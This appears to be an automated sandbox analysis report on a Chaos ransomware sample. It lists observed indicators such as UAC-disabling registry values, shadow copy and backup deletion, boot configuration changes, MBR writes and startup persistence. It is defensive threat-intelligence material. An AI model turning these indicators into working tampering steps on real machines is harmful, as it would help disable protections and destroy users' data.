Analysis Overview
Threat Level: Known bad
The file http://google.com was found to be: Known bad.
Malicious Activity Summary
Chaos
Chaos Ransomware
UAC bypass
Modifies boot configuration data using bcdedit
Deletes shadow copies
Downloads MZ/PE file
Disables Task Manager via registry modification
Deletes backup catalog
Drops startup file
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Checks computer location settings
Drops desktop.ini file(s)
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Enumerates physical storage devices
Checks SCSI registry key(s)
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of FindShellTrayWindow
Runs net.exe
Runs ping.exe
NTFS ADS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Delays execution with timeout.exe
Interacts with shadow copies
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy service COM API
Modifies registry key
Kills process with taskkill
Modifies Internet Explorer settings
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-09-13 08:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-13 08:51
Reported
2023-09-13 09:00
Platform
win10v2004-20230831-en
Max time kernel
535s
Max time network
540s
Command Line
Signatures
Chaos
Chaos Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\ScaryInstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\ScaryInstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\ScaryInstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29LockScreen.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ScaryInstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ScaryInstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ScaryInstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A914.tmp\CreepScreen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\CreepScreen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A914.tmp\melter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\melter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C67F.tmp\CreepScreen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C67F.tmp\melter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2415528079-3794552930-4264847036-1000\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2atm621co.jpg" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "140" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | C:\Windows\System32\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000d22d16854fdcd90104b1910220e6d9014d78cb0320e6d90114000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
